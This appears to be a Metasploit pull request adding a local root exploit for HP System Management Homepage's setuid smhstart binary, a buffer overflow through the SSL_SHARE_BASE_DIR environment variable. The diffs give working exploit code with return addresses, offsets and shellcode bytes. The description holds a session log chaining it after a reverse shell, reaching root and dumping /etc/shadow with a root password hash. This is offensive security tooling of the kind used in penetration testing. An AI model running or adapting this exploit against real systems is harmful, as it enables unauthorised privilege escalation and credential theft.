### PR TITLE
Hp system management root local exploit

### DIFF
--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -8,17 +8,8 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
-require 'msf/core/post/file'
-require 'msf/core/post/linux/priv'
-require 'msf/core/exploit/local/linux_kernel'
 require 'msf/core/exploit/local/linux'
-require 'msf/core/exploit/local/unix'
 require 'msf/core/exploit/exe'
-
-#load 'lib/msf/core/post/file.rb'
-#load 'lib/msf/core/exploit/local/unix.rb'
-#load 'lib/msf/core/exploit/local/linux.rb'
-#load 'lib/msf/core/exploit/local/linux_kernel.rb'
 
 class Metasploit4 < Msf::Exploit::Local
 
@@ -85,8 +76,17 @@ class Metasploit4 < Msf::Exploit::Local
 		pl = payload.encoded
 		padding = rand_text_alpha(target['Offset'])
 		ret = [target['CallEsp']].pack('V')
-		exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
-		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
+		exploit =  pl
+		exploit << ret
+		exploit << "\x81\xc4\x11\xff\xff\xff" 	# add esp, 0xffffff11
+		exploit << "\xe9\x0e\xff\xff\xff"		# jmp => begining of pl
+		exploit << padding
+		exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
+		id=cmd_exec("id -un")
+		if id!="hpsmh"
+			fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
+		end
+		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
 		cmd_exec("#{datastore['smhstartDir']}/smhstart")
 	end
 

--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -84,7 +84,7 @@ class Metasploit4 < Msf::Exploit::Local
 		exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
 		id=cmd_exec("id -un")
 		if id!="hpsmh"
-			fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must to be hpsmh to exploit this")
+			fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
 		end
 		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
 		cmd_exec("#{datastore['smhstartDir']}/smhstart")

--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -1,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/local/linux_kernel'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/local/unix'
+require 'msf/core/exploit/exe'
+
+#load 'lib/msf/core/post/file.rb'
+#load 'lib/msf/core/exploit/local/unix.rb'
+#load 'lib/msf/core/exploit/local/linux.rb'
+#load 'lib/msf/core/exploit/local/linux_kernel.rb'
+
+class Metasploit4 < Msf::Exploit::Local
+
+	include Msf::Exploit::EXE
+	include Msf::Post::File
+	include Msf::Post::Common
+
+	include Msf::Exploit::Local::Linux
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'HP System Management Homepage Local Privilege Escalation',
+				'Description'   => %q{
+					Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        =>
+					[
+						'agix'           #@agixid
+					],
+				'Platform'      => [ 'linux' ],
+				'Arch'          => [ ARCH_X86 ],
+				'SessionTypes'  => [ 'shell', 'meterpreter' ],
+				'Payload'		=>
+					{
+						'Space'     => 227,
+						'BadChars' 	=> "\x00\x22"
+					},
+				'References'    =>
+					[
+						['OSVDB', '91812'] #not exactly but there is none...
+					],
+				'Targets'       =>
+					[
+						[ 'Hpsmh 7.1.1',
+							{
+								'Arch' => ARCH_X86,
+								'CallEsp' => 0x080c86eb,	#call esp
+								'Offset' => 64
+							}
+						],
+						[ 'Hpsmh 7.1.2',
+							{
+								'Arch' => ARCH_X86,
+								'CallEsp' => 0x080c8b9b,	#call esp
+								'Offset' => 64
+							}
+						],
+					],
+				'DefaultTarget' => 0,
+				'DisclosureDate' => "Mar 30 2013",
+			}
+			))
+		register_options([
+				OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
+			], self.class)
+	end
+
+	def exploit
+		pl = payload.encoded
+		padding = rand_text_alpha(target['Offset'])
+		ret = [target['CallEsp']].pack('V')
+		exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}")
+		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
+		puts cmd_exec("#{datastore['smhstartDir']}/smhstart")
+	end
+
+end

--- a/modules/exploits/linux/local/hp_smhstart.rb
+++ b/modules/exploits/linux/local/hp_smhstart.rb
@@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local
 					],
 				'Platform'      => [ 'linux' ],
 				'Arch'          => [ ARCH_X86 ],
-				'SessionTypes'  => [ 'shell', 'meterpreter' ],
+				'SessionTypes'  => [ 'shell' ],
 				'Payload'		=>
 					{
 						'Space'     => 227,
@@ -57,17 +57,21 @@ class Metasploit4 < Msf::Exploit::Local
 							{
 								'Arch' => ARCH_X86,
 								'CallEsp' => 0x080c86eb,	#call esp
-								'Offset' => 64
+								'Offset' => 58
 							}
 						],
 						[ 'Hpsmh 7.1.2',
 							{
 								'Arch' => ARCH_X86,
 								'CallEsp' => 0x080c8b9b,	#call esp
-								'Offset' => 64
+								'Offset' => 58
 							}
 						],
 					],
+				'DefaultOptions' =>
+					{
+						'PrependSetuid'    => true
+					},
 				'DefaultTarget' => 0,
 				'DisclosureDate' => "Mar 30 2013",
 			}
@@ -81,9 +85,9 @@ class Metasploit4 < Msf::Exploit::Local
 		pl = payload.encoded
 		padding = rand_text_alpha(target['Offset'])
 		ret = [target['CallEsp']].pack('V')
-		exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}")
+		exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
 		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
-		puts cmd_exec("#{datastore['smhstartDir']}/smhstart")
+		cmd_exec("#{datastore['smhstartDir']}/smhstart")
 	end
 
 end


### PR DESCRIPTION
after getting a shell with hp_system_management exploit, use exploit/linux/local/hp_smhstart to get root.
The exploit only work with shell (no meterpreter)

```
msf exploit(hp_system_management) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(hp_system_management) > exploit

[*] Started reverse handler on 192.168.79.67:4444 
[*] 192.168.79.6:2381 - Sending exploit...
[*] Command shell session 6 opened (192.168.79.67:4444 -> 192.168.79.6:44817) at Tue Apr 02 13:22:53 +0200 2013

id
uid=500(hpsmh) gid=500(hpsmh) groups=500(hpsmh) context=system_u:system_r:initrc_t:s0
^Z
Background session 6? [y/N]  y
msf exploit(hp_system_management) > use exploit/linux/local/hp_smhstart 
msf exploit(hp_smhstart) > exploit

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf exploit(hp_smhstart) > set SESSION 6
SESSION => 6
msf exploit(hp_smhstart) > exploit

[*] Started reverse handler on 192.168.79.67:4445 
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.79.6
[*] Meterpreter session 7 opened (192.168.79.67:4445 -> 192.168.79.6:56526) at Tue Apr 02 13:23:39 +0200 2013
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: uid=0, gid=500, euid=0, egid=500, suid=0, sgid=500
meterpreter > shell
Process 1456 created.
Channel 1 created.
sh: no job control in this shell
sh-4.1# cat /etc/shadow
root:$6$kh495XSzo3bAXDOp$sCNv8CmpVDL.E.Lpm1ru/HG19j3SZI5XVbNvJVYRND8/Odv91dX6Y2lNcC35W2kllwLBc21LFijB66bNYqYmP1:15166:0:99999:7:::
sh-4.1# 
```
